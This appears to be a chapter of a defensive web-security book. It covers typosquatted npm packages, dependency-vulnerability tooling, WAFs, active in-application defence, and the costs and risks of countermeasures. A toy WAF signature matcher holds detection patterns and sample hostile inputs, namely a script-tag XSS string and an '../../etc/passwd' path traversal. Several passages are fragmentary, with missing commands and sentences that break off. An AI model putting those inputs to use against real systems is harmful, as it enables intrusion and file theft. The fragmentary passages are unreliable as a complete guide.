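Anything this returns is code that will run on your machine simply by installing the package, so it is the first thing to read.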
Similarly to Doppelganger Domains, people often mistype what they want to install. If you were someone who wanted to do something malicious, like have consumers of your package destroy or modify their systems, send sensitive information to you, or any number of other malicious activities (ideally identified in the Identify Risks section. If not already, add), doppelganger packages are an excellent avenue. They raise the likelihood that someone will install your malicious package by mistyping the name of another package with a very similar name. I covered this in my “0wn1ng The Web” presentation, with demos.
Make sure you are typing the correct package name. Copy -> Pasting works.
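One way to catch a mistyped name before it is installed is to compare it against the packages you actually intend to use. The following is a minimal sketch of that idea using edit distance. The list of approved names, the threshold of two edits and the function names are all assumptions for illustration.

```javascript
// Classic dynamic-programming edit distance (Levenshtein), single row.
function editDistance(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diagonal = prev[0];
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const temp = prev[j];
      prev[j] = Math.min(
        prev[j] + 1,                                // deletion
        prev[j - 1] + 1,                            // insertion
        diagonal + (a[i - 1] === b[j - 1] ? 0 : 1)  // substitution
      );
      diagonal = temp;
    }
  }
  return prev[b.length];
}

// Return the approved names that the requested name is suspiciously close to.
// An exact match is not suspicious, so it returns an empty list.
function possibleTypos(requested, approved, maxDistance = 2) {
  if (approved.includes(requested)) return [];
  return approved.filter((name) => editDistance(requested, name) <= maxDistance);
}

// Hypothetical list of packages the team intends to use.
const approvedPackages = ['express', 'lodash', 'request'];
console.log(possibleTypos('expres', approvedPackages));
console.log(possibleTypos('lodash', approvedPackages));
```

A non-empty result means the name is close to, but not the same as, something you trust, which is exactly what a doppelganger package relies on.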
Reviewing and deciding as an organisation which packages you allow your developers to consume is another good safety measure. Yes, it means someone has to do the reviewing, but partly relying on the vetting that the tooling and other options discussed in this section provide can make this process quicker. Then via the Enterprise admin console, set Read through cache to Off so that only whitelisted packages can be fetched.
Whitelisted packages are those that are added to the Enterprise instance with:
npme add-package <packagename>
Simply checking the NPM registry to see if any of your installed or specific packages are currently out of date.
Running the following command in your application directory:
May produce output like the following:
Wanted is the maximum version of the package that satisfies the semver range specified in
latest is the version of the package tagged as latest in the registry.
Is a similar tool to npm-outdated, but provides more information and an API useful for using in a CI tool-chain. npm-check can also inform you of missing packages, or packages that are not currently being used.
package.json file in your NodeJS project to check whether your dependencies are up to date and no known vulnerabilities are found. You embed a badge on your Github page giving immediate feedback, which links to a page with details of any issues for your dependencies.
RetireJS has the following:
npm i -g retire
precommit-hook, which installs the git pre-commit hook into the usual .git/hooks/pre-commit file of your project’s repository. This will allow us to run any scripts immediately before a commit is issued.
package.json. This will make sure that when other team members fetch your code, the same retire script will be run on their
If you do not configure the hook via the
package.json to run specific scripts, it will run
test by default. See the RetireJS documentation for options.
pre-commit property allows you to specify which scripts you want run before a successful commit is performed. The following
package.json defines that the
validate scripts will be run.
validate runs our
Keep in mind that pre-commit hooks can be very useful for all sorts of checking of things immediately before your code is committed. For example running security regression tests mentioned previously in Fascicle 0 with the OWASP ZAP API, as demonstrated here: https://youtu.be/DrwXUOJWMoo.
provides “intentful auditing as a stream of intel for bithound”. Last time I spoke with Adam Baldwin this project was moving slowly. From all the redirects going on, it appears to be now soaked up into Node Security Platform (NSP).
According to the Bithound Github, there doesn’t appear to be much activity on this project currently, which may make sense as requireSafe appears to have been moved to NSP.
In regards to NPM packages, we know the following things:
bithound can be configured to not analyse some files. Very large repositories are prevented from being analysed due to large scale performance issues.
Analyses both NPM and Bower dependencies and notifies you if any are:
Analysis of open source projects is free.
NSP at the time of writing is quite popular. It provides Github pull request integration and has a Code Climate Node Security Engine. Code Climate was discussed briefly in the “Linting, Static Analysis” section of “Code Review” in the Process and Practises chapter of Fascicle 0. It also has a CLI, so it is CI friendly.
You can install the NSP CLI like:
npm install -g nsp
To find out what nsp gives you:
To run a check, cd into your application directory and:
Any known vulnerabilities present will be printed.
There is also a:
gulp-nsp) which you can use to check all dependencies listed in your
Ctrl+Shift+C and run the following command:
ext install vscode-nsp
Has a fairly similar feature set to NSP, plus more, like:
The pricing model seems a little dearer for non open source projects than NSP.
You could of course just list all of your projects and global packages and check that there are none in the advisories, but this would be more work and who is going to remember to do that all the time?
For .Net developers, there is the likes of OWASP SafeNuGet.
OWASP DependencyCheck also notifies of known, publicly disclosed vulnerabilities in Java and .Net, with experimental support for Ruby, Node.js and Python. I haven’t used DependencyCheck myself. Be aware that it produces false positives and false negatives.
WAFs are similar to Intrusion Prevention Systems (IPS), except they operate at the Application Layer (HTTP), Layer 7 of the OSI model, so they understand the concerns of your web application at a technical level. WAFs protect your application against a large number of attacks, such as XSS, CSRF, SQLi, Local File Inclusion (LFI), session hijacking and invalid requests (requests to things that do not exist, think 404). WAFs sit in-line between a gateway and the web application and run as a proxy, either on the physical web server or on another network node. Only the traffic directed to the web application is inspected, whereas an IDS/IPS inspects all network traffic passed through its interfaces. WAFs compare the network traffic targeting the web application against signatures that look like specific vulnerabilities, and apply the associated rule(s) when matches are detected. They are not limited to dealing with known signatures though: some WAFs can detect and prevent attacks they have not seen before, such as responses containing larger than specified payloads. The source code of the web application does not have to be modified.
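To give a feel for what signature matching means in practice, here is a deliberately tiny sketch. The three signatures and the function name are invented for illustration and would be trivial to evade. Real WAF rule sets are far larger, normalise input much more carefully, and inspect headers and bodies as well as URLs.

```javascript
// Toy signatures only. Each pairs a rule name with a pattern to look for.
const SIGNATURES = [
  { name: 'xss-script-tag', pattern: /<script\b/i },
  { name: 'sqli-union-select', pattern: /\bunion\b\s+\bselect\b/i },
  { name: 'lfi-path-traversal', pattern: /\.\.[\/\\]/ }
];

// Return the names of all signatures that match the decoded request URL.
function matchSignatures(rawUrl) {
  let decoded;
  try {
    decoded = decodeURIComponent(rawUrl);
  } catch (err) {
    return ['malformed-encoding']; // undecodable input is itself suspicious
  }
  return SIGNATURES
    .filter((sig) => sig.pattern.test(decoded))
    .map((sig) => sig.name);
}

console.log(matchSignatures('/search?q=%3Cscript%3Ealert(1)%3C/script%3E'));
console.log(matchSignatures('/files?name=../../etc/passwd'));
console.log(matchSignatures('/products?id=42'));
```

A proxy built around something like this would apply the rule associated with each matched name (block, log, challenge) before the request ever reaches the web application.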
You can think of this as taking a WAF one step closer to your application. In fact integrating it with your application. Augmenting your application with logic to detect and respond to threats.
AppSensor brings detection -> prevention to your domain level. Most applications today just take attacks & fall over. I have heard so many times we want our applications to fail securely when they get bad input. We do not want our applications being bullied and failing securely. We want them to not fail at all in production, but rather defend themselves.
Technically AppSensor is not a WAF because the concepts are used to shape your application logic.
The project defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into your applications. Providing attack awareness baked in, with real-time defences.
AppSensor provides > 50 (signature based) detection points. It also provides guidance on how to respond once an attack is identified. Possible actions include:
At the time of writing, the sample code is only in Java. The documentation is well worth checking out though. See the Additional Resources chapter for resources.
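The idea of a detection point with escalating responses can be sketched in a few lines of JavaScript. This is not AppSensor's API. The class name, thresholds and action names below are all hypothetical, and a real implementation would also need time windows, persistence and a way to carry out each response.

```javascript
// Hypothetical thresholds mapping event counts to escalating responses,
// ordered from most to least severe so the first match wins.
const RESPONSES = [
  { threshold: 10, action: 'block' },
  { threshold: 5, action: 'logout' },
  { threshold: 3, action: 'warn' }
];

class DetectionPoint {
  constructor() {
    this.counts = new Map(); // clientId -> number of suspicious events seen
  }

  // Record one suspicious event for a client and return the response to apply.
  record(clientId) {
    const count = (this.counts.get(clientId) || 0) + 1;
    this.counts.set(clientId, count);
    const match = RESPONSES.find((r) => count >= r.threshold);
    return match ? match.action : 'log';
  }
}

// Example: a client repeatedly requesting routes that do not exist.
const unknownRoutes = new DetectionPoint();
let lastAction;
for (let i = 0; i < 5; i++) {
  lastAction = unknownRoutes.record('203.0.113.7');
}
console.log(lastAction);
```

Because the logic lives inside the application, the detection point can be keyed on things a WAF cannot see, such as the authenticated user or a business rule being violated.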
The application should recognise unusual requests. Automated scanning should be distinguishable from normal traffic.
By creating custom behaviour that responds to specific out of the ordinary requests with misleading feedback and/or behaviour that builds the attacker’s confidence and ultimately wastes their time, you as the application administrator can have the upper hand when it comes to actively defending against your attackers.
By spending the attacker’s budget for them, you are ultimately depleting their resources, which will cause them to make silly mistakes and be caught and/or just run out of time.
Often with increased security comes increased confidence. Increased confidence is a weakness in itself, along with the fact that it brings with it other vulnerabilities. The more you know, the more you should be aware of how vulnerable you are.
With the added visibility, you will have to make decisions based on the new found information you now have. There will be no more blissful ignorance if there was before.
There will be learning and work to be done to become familiar with libraries and tooling. Code will have to be written around logging as in wrapping libraries, initialising and adding logging statements or hiding them using AOP.
Instrumentation will have to be placed in your code. Again another excellent candidate for AOP.
You may have to invest considerable time yourself to gain good understanding into what can go wrong, where, how and how to mitigate it happening. Be inquisitive and experiment.
There will be more code in your systems. More code is more code that can have faults.
Be very careful with sanitisation. Try first to use well tested and battle hardened libraries. Resist going out on your own to modify or create sanitisation routines. It is very easy to miss edge cases and small spots that your untrusted data may end up in that you did not anticipate, thus leaving you susceptible to attack.
As with all code review, it can be costly. You need to weigh the cost of review against the cost of you and your customers being exploited, i.e. losing the assets we have discussed.
Avoiding the use of external interpreters means you will have to do the interpreting yourself, or you will have to be more thorough in performing the other countermeasures.
Occasionally finding a parametrised API for your use case can be a challenge.
Going through the process of defining your semantic types can take some time, and it often causes the stakeholders to think about things they may have glossed over. Working through validation, filtering and sanitisation can be time consuming.
Making sure you embrace least privilege will probably take you some time, again, this cost needs to be weighed up.
Making sure that the system is not revealing unnecessary information that could aid an attacker in their understanding of your system’s internals will mean some testing and probably code review will be necessary. This will take time.
If you have a legacy system with SQLi issues, then you will need to invest the time to fix them.
One risk that I see happening here all too often is developers not understanding the particular NoSQL data store they are using. As I have mentioned, the 225+ data stores all like to do things differently, so you will need to understand their APIs, and what they do and do not do well. Read the documentation. If the documentation is poor, consider using something else. If that is out of the question, dive into the implementation and work out what you need to do from that.
Reviewing code, testing and making the changes costs money.
It may just take time here to work out what you are currently doing wrong and what you can do better.
Time to review, test and apply countermeasures.
Time to review, test and apply countermeasures.
Time to review, test and apply countermeasures.
Time to review, test and apply countermeasures.
Bots may/will get smarter and start reading and thinking for themselves. It is probably worth not crossing that bridge until it arrives. This will not stop humans spamming, but neither will any other captcha, unless they also stop genuine users, which according to the studies mentioned in the countermeasures section happens very often.
If you decide to go with one of the captcha options, there is the risk of:
Reliance on adjacent layers of defence means those layers have to actually be up to scratch. There is a possibility that they will not be.
Possibility of missing secrets being sent over the wire.
Possible reliance on obscurity with many of the strategies I have seen proposed. Just be aware that obscurity may slow an attacker down a little, but it will not stop them.
With moving any secrets from source code to configuration files, there is a possibility that the secrets will not be changed at the same time. If they are not changed, then you have not really helped much, as the secrets are still in source control.
With good configuration tools like node-config, you are provided with plenty of options for splitting up meta-data, creating overrides, storing different parts in different places, etc. There is a risk that you do not use the potential power and flexibility to your best advantage. Learn the ins and outs of whatever system it is you are using, and leverage its features to do the best at obscuring your secrets and, if possible, securing them.
is an excellent configuration package with lots of great features. There is no security provided with node-config, just some potential obscurity. Just be aware of that, and as discussed previously, make sure surrounding layers have beefed up security.
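Whichever configuration tooling you use, the underlying idea is that secrets are supplied from outside the source tree and the application refuses to start without them. The following sketch shows that idea using environment variables and nothing else. It does not use node-config's API, the variable names are hypothetical, and, as noted above, this provides no security in itself.

```javascript
// Read required secrets from the environment and fail fast if any are missing.
function loadSecrets(requiredNames, env = process.env) {
  const missing = requiredNames.filter((name) => !env[name]);
  if (missing.length > 0) {
    // Report only the names, never the values.
    throw new Error(`Missing required secrets: ${missing.join(', ')}`);
  }
  return Object.fromEntries(requiredNames.map((name) => [name, env[name]]));
}

// Hypothetical variable names, with a stand-in environment for illustration.
const exampleEnv = {
  DB_PASSWORD: 'from-the-environment',
  API_KEY: 'also-from-the-environment'
};
const secrets = loadSecrets(['DB_PASSWORD', 'API_KEY'], exampleEnv);
console.log(Object.keys(secrets));
```

Failing fast on a missing secret also helps with the risk mentioned earlier: if a secret was moved out of source code, there is no old hard-coded value left for the application to silently fall back to.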
As is often the case with Microsoft solutions, their marketing often leads people to believe that they have secure solutions to problems when that is not the case. As discussed previously, there are plenty of ways to get around the Microsoft so called security features. As with anything else in this space, they may provide some obscurity, but do not depend on them being secure.
Statements like the following have the potential for producing over confidence:
“vSentry protects desktops without requiring patches or updates, defeating and automatically discarding all known and unknown malware, and eliminating the need for costly remediation.”
Please keep your systems patched and updated.
“With Bromium micro-virtualization, we now have an answer: A desktop that is utterly secure and a joy to use”
There is a risk that people will believe this.
As with Microsoft’s “virtualisation-based security”, Linux containers may slow system compromise down, but a determined attacker will find other ways to get around container isolation. Maintaining a small set of user accounts is a worthwhile practise, but that alone will not be enough to stop a highly skilled and determined attacker moving forward.
Even when technical security is very good, an experienced attacker will use other mediums to gain what they want, like social engineering and physical attacks, as discussed in the People and Physical chapters of Fascicle 0, or some other attack vectors listed in this book. Defence in depth is crucial in achieving good security. Concentrate on the lowest hanging fruit first and work your way up the tree.
Locking file permissions and ownership down is good, but that alone will not save you.
Applying least privilege to everything can take quite a bit of work. Yes, it is probably not that hard to do, but it does require a breadth of thought and time. Some of the areas discussed could be missed. Having more than one person working on the task is often effective, as you can bounce ideas off each other, and the other person is likely to notice areas that you may have missed and vice versa.
Segmentation is useful, and a common technique for helping to build resistance against attacks. It does introduce some complexity though. With complexity comes the added likelihood of introducing a fault.
If you follow the advice in the countermeasures section, you will be doing more than most other organisations in this area. It is not hard, but if implemented could increase complacency/over confidence. Always be on your guard. Always expect that although you have done a lot to increase your security stance, a determined and experienced attacker is going to push buttons you may have never realised you had. If they want something enough and have the resources and determination to get it, they probably will. This is where you need strategies in place to deal with post compromise. Create process (ideally partly automated) to deal with theft.
Also consider that once an attacker has made off with your data-store, even if it is currently infeasible to brute-force the secrets, there may be other ways around obtaining the missing pieces of information they need. Think about the paper shredders as discussed in the Physical chapter of Fascicle 0 and the associated competitions. With patience, most puzzles can be cracked. If the compromise is an opportunistic type of attack, they will most likely just give up and seek an easier target. If it is a targeted attack by determined and experienced attackers, they will probably try other attack vectors until they get what they want.
Do not let over confidence be your weakness. An attacker will search out the weak link. Do your best to remove weak links.
This is a complex topic with many areas that the developer must understand in order to make the best decisions. Having team members that already have strengths in these areas can help a lot. The technologies are moving fast, but many of the concepts encountered are similar across the technology generations. It helps to have a healthy fear, some experience of what can go wrong, and an understanding of just how many concepts must be understood in order to piece together a solution that is going to work well and resist the attacks of your enemies.
The flows, what they are, how they work and in which situations you should use any one of them, can easily be misunderstood.
When navigating the edge-cases and deciding on specific paths, the developer can often end up at a dead-end and must back-track/re-architect their approach.
There are risks that you may misinterpret any of the specifications, such as OAuth and OpenID, as these are complicated and fraught with concepts that can be easily misunderstood.
The Web Cryptography API specification provides algorithm recommendations, that are not necessarily optimal, such as the most commonly used 30 year old AES-CBC mode of operation that has known vulnerabilities, and caveats that you must know about in order to use securely, such as:
Some of the above content was used from https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation
Licensed under CC by 3.0
There is no normative guidance in the specification as to which primitives have better qualities than others. For example, AES-GCM is good, but none of the other symmetric block cipher modes listed are authenticated encryption modes, so they don’t provide assurance that the data has not been modified. With a specification that is lacking normative advice to browser vendors, it’s likely that the Web Crypto API will fail to serve the purpose it was created for, or at best provide the right primitives but provide the dangerous ones also. Looking at where Chrome and Firefox are heading, that looks to be the case.
The following table shows the Web Crypto API supported algorithms for Chromium (as of version 46) and Mozilla (as of July 2016).
At least both are offering AES-GCM, but now you have to make the decision, and too much choice can bring confusion. The only way for us web developers to know which choices to make is to spend the time researching what to use where, and asking ourselves why. Question everything.
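To see what an authenticated encryption mode buys you, the following sketch encrypts a message with AES-GCM, flips a single bit of the ciphertext as an attacker might, and then attempts to decrypt it. It runs under NodeJS via `webcrypto` (in a browser you would use `window.crypto`). The function name and message are hypothetical.

```javascript
const { webcrypto } = require('node:crypto'); // in a browser, use window.crypto
const { subtle } = webcrypto;

// Encrypt with AES-GCM, flip one bit of the ciphertext, then try to decrypt.
// Resolves to true if the tampering was detected (decrypt rejected).
async function tamperingIsDetected() {
  const key = await subtle.generateKey(
    { name: 'AES-GCM', length: 256 },
    false,
    ['encrypt', 'decrypt']
  );
  const iv = webcrypto.getRandomValues(new Uint8Array(12));
  const data = new TextEncoder().encode('transfer 10 to alice');
  const ciphertext = new Uint8Array(
    await subtle.encrypt({ name: 'AES-GCM', iv }, key, data)
  );

  ciphertext[0] ^= 1; // simulate an attacker modifying the stored ciphertext

  try {
    await subtle.decrypt({ name: 'AES-GCM', iv }, key, ciphertext);
    return false; // decryption succeeded, so the change went unnoticed
  } catch (err) {
    return true; // the authentication check failed
  }
}

tamperingIsDetected().then((detected) => console.log(detected));
```

With a mode that is not authenticated, the same modification would not be rejected by the decrypt operation itself, and you would need to add your own integrity check (a MAC, for example) on top.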
As usual, the OWASP guidance (Cryptographic Storage Cheat Sheet) is excellent.
There are many Stack Overflow questions and answers where many think they have the answers but really don’t, and even accepted answers can be completely incorrect and misleading. Learn who the experts are, find out what they have to say, and test their answers against what other experts have to say and for yourself. All the information is available, but you do have to take the time to absorb it. There are few short-cuts that will put you in a good place for working out the optimal solution for your project.
Adding process and tooling as discussed is a really good start, but it’s not a complete solution alone to take care of the consumption of free and open source packages.
Some of the packages we consume may have good test coverage, be up to date, and have no known vulnerabilities. Are the tests testing the right things though? Are the tests testing that something bad can “not” happen, as we discussed in the creation of “Evil Test Conditions” in the “Agile Development and Practices” section of the “Process and Practises” chapter in Fascicle 0? This is where we really need something extra on top of a good process, static analysis and dependency checking tools. This is really where you need to leverage the likes of security regression testing, as I discussed in the “Agile Development and Practices” section of the “Process and Practises” chapter in Fascicle 0.
There is a danger of implementing too much manual process, thus slowing development down more than necessary. The way the process is implemented will have a lot to do with its level of success. For example, automating as much as possible, so that developers have as little as possible to think about, is going to make for more productive, focused and happier developers.
For example, a Development Team often needs to pull a library into their project in the middle of working on a product backlog item, not necessarily planned at the beginning of the Sprint. If they have to context switch while a legal review and/or manual code review takes place, this will cause friction and reduce the team’s performance, even though it may be out of their hands.
In this case, the Development Team really needs a dedicated resource to perform the legal review. The manual review could be done by another team member or even themselves with perhaps another team member having a quicker review after the fact. These sorts of decisions need to be made by the Development Team, not mandated by someone outside of the team that doesn’t have skin in the game or does not have the localised understanding that the people working on the project do.
Maintaining a list of the approved libraries really needs to be a process that does not take a lot of human interaction. However you work out your process, make sure it does not require a lot of extra developer effort on an ongoing basis. Some effort up front to automate as much as possible will facilitate this.
Relying on tooling alone is not enough.
Using the likes of pre-commit hooks with the CLIs and the other tooling options detailed in the Countermeasures section integrated with CI builds, and creating scripts to do most of the work for us, is going to be a good option to start with. Adding the automation of security regression testing on top of that, and your solution for managing potential vulnerabilities in free and open source packages is starting to look pretty solid.
Applying WAFs can act as a band-aid, masking the underlying issues with the application code. Ideally your security issues want to fail fast in development. If you are running the types of tests and doing the types of activities I discussed in Fascicle 0 in the Process and Practises chapter, you should have a fairly good handle on your defects. Most WAFs I have seen are pretty old-school, in that they do not actively attack the attackers.
Moving toward an active automated prevention standpoint where you have code that intentionally attracts and responds to attackers is usually far more effective at dealing with malicious actors.
All security has a cost. Your resources are limited, spend them wisely.
You can do a lot for little cost here. I would rather trade off a few days’ work in order to have really good logging and instrumentation systems throughout the code base that show you errors fast in development, along with pretty much anything else you want to measure. Then show the types of errors and statistics devops need to see in production.
Same goes for dark cockpit type monitoring. Find a tool that you find a pleasure to work with. There are just about always free and open source alternatives to every commercial tool. If you are working with a start-up or young business, the free and open source tools can be excellent for keeping ongoing costs down, especially mature tools that are also well maintained, like the ones I’ve mentioned in the Countermeasures section.
If you can tighten up your validation and filtering, then less work will be required around sanitisation and that is where most of the effort (effort ≈ time) seems to go. This often reduces the end user experience though.
Once you fully understand the dangers you’ll be able to make these decisions easier.
As mentioned in the “Risks that Solution Causes”, I will generally favour storing session identifiers in localstorage and concentrating on Input Validation, Filtering and Sanitisation.
You have a responsibility to your organisation and your customers to keep them safe. When you have weighed the costs of reviewing your code, and if it is honestly more expensive than the cost of you and your customers being exploited, i.e. losing your assets, then and only then should you neglect this.
Writing interpreters will more than likely be very costly, and in most cases this will not be necessary. Find one that takes the risks discussed seriously and provides the correct countermeasures as discussed, or make sure you take care of the validation, filtering and sanitisation properly yourself.
If you cannot find a parametrised API for your use case, you will need to consider doing this yourself, as in wrapping whatever the best available option is and providing your own parametrisation.
Creating semantic types forces you and your stakeholders to think about your business requirements. Anything that makes us think about these is usually helpful in making sure we are building the right thing. There are not really any alternatives to actually thinking the semantic types, validation, filtering and sanitisation through and making sure you are doing it properly. This is crucial to catching malicious sequences of untrusted data. The only other alternative is to just not process untrusted data.
Make sure your accounts, and everything that can execute untrusted data, have only the privileges they need to do what they must do and no more.
If you do try to cut costs here, then you are providing the information that your attacker requires to understand how your system’s internals are structured. If you reveal the system’s weaknesses, they will be exploited.
The only possible short-cut here is to not deal with untrusted data.
Similar to SQLi.
Exactly how much it will cost you will depend on how poorly the code is written, and how much has to be refactored.
If you have had a look at how easily some of these defects are exploitable, then you may realise that the costs to remedy are small in comparison to losing your assets.
Similar costs to that of Command Injection, just different technology.
Similar costs to that of what we have already covered, just different technology.
Similar costs to that of what we have already covered, just different technology.
Similar costs to that of what we have already covered, just different technology.
It does mean that any spam submitted by a real human will have to be moderated by a real human, although this usually takes less time than the human submitting the spam. For me, this is a trade-off worth taking to provide an optimal user experience for my customers/clients.
There is potential for hidden costs here, as adjacent layers will need to be hardened. There could be trade-offs here that force us to focus on the adjacent layers. This is never a bad thing though. It helps us to step back and take a holistic view of our security.
There should be little cost in moving secrets out of source code and into configuration files.
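As a rough sketch of how small that change can be, the following TypeScript parses secrets from the contents of a configuration file rather than from literals in the source. The `SecretsConfig` shape and the key names `dbPassword` and `sessionSecret` are hypothetical, and reading the file itself (for example with Node's `fs.readFileSync` from a path outside the repository) is left out so the example stays dependency-free.

```typescript
// Hypothetical set of secrets the application needs.
interface SecretsConfig {
  dbPassword: string;
  sessionSecret: string;
}

// Parse the raw JSON text of a configuration file and fail fast if a
// required secret is missing. Error messages name the key, never the value.
function parseSecretsConfig(rawJson: string): SecretsConfig {
  const parsed: unknown = JSON.parse(rawJson);
  if (typeof parsed !== "object" || parsed === null) {
    throw new Error("Secrets config must be a JSON object");
  }
  const record = parsed as Record<string, unknown>;
  const read = (key: string): string => {
    const value = record[key];
    if (typeof value !== "string" || value.length === 0) {
      throw new Error(`Missing secret: ${key}`);
    }
    return value;
  };
  return {
    dbPassword: read("dbPassword"),
    sessionSecret: read("sessionSecret"),
  };
}
```

The configuration file then needs to be kept out of source control and readable only by the account the application runs as, otherwise the secret has simply moved rather than been protected.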
You will need to weigh up whether the effort to obfuscate secrets is worth it or not. It can also make the developers' job more cumbersome. Some of the options provided may be worthwhile doing.
Containers have many other advantages and you may already be using them for making your deployment processes easier and less likely to have dependency issues. They also help with scaling and load balancing, so they have multiple benefits.
This is something you should be at least considering, and probably doing, in every case. It is one of those considerations that is worthwhile applying to most layers.
Segmenting of resources is a common and effective measure to take for at least slowing down attacks and a cost well worth considering if you have not already.
The countermeasures discussed here go without saying, although many organisations do not do them well if at all. It is up to you whether you want to be one of the statistics that has all of their secrets revealed. Following the countermeasures here is something that just needs to be done if you have any data that is sensitive in your data-store(s).
If you still struggle, reach out to me, and I’ll do my best to help.
I’ve covered many technologies in this chapter and also in others, such as in the Network chapter under Countermeasures:
That, if adopted and practised properly, along with selecting the right low level primitives for the Web Crypto API, can help us achieve a level of security that will work for us (the web application developers/owners). Of course this puts our best interests at the forefront, but not necessarily the end users'. As developers creating solutions for our users, we have a responsibility to put our users' concerns first.
The process has to be streamlined so that it does not get in the developers' way. A good way to do this is to ask the developers how it should be done. They know what will get in their way. In order for the process to be a success, the person(s) mandating it will need to get solid buy-in from the people using it (the developers).
The idea of setting up a process that notifies at least the Development Team if a library they want to use has known security defects needs to be pitched to all stakeholders (developers, product owner, even external stakeholders) the right way. It needs to provide obvious benefit and not make anyone's life harder than it already is. Everyone has their own agendas. Rather than fighting against them, include consideration for them in your pitch. I think this sort of pitch is actually reasonably easy if you keep these factors in mind.
It will cost you some time to create these types of active defence modules. If you are lucky, by the time you read this, I may already have some. It is on my current to-do list.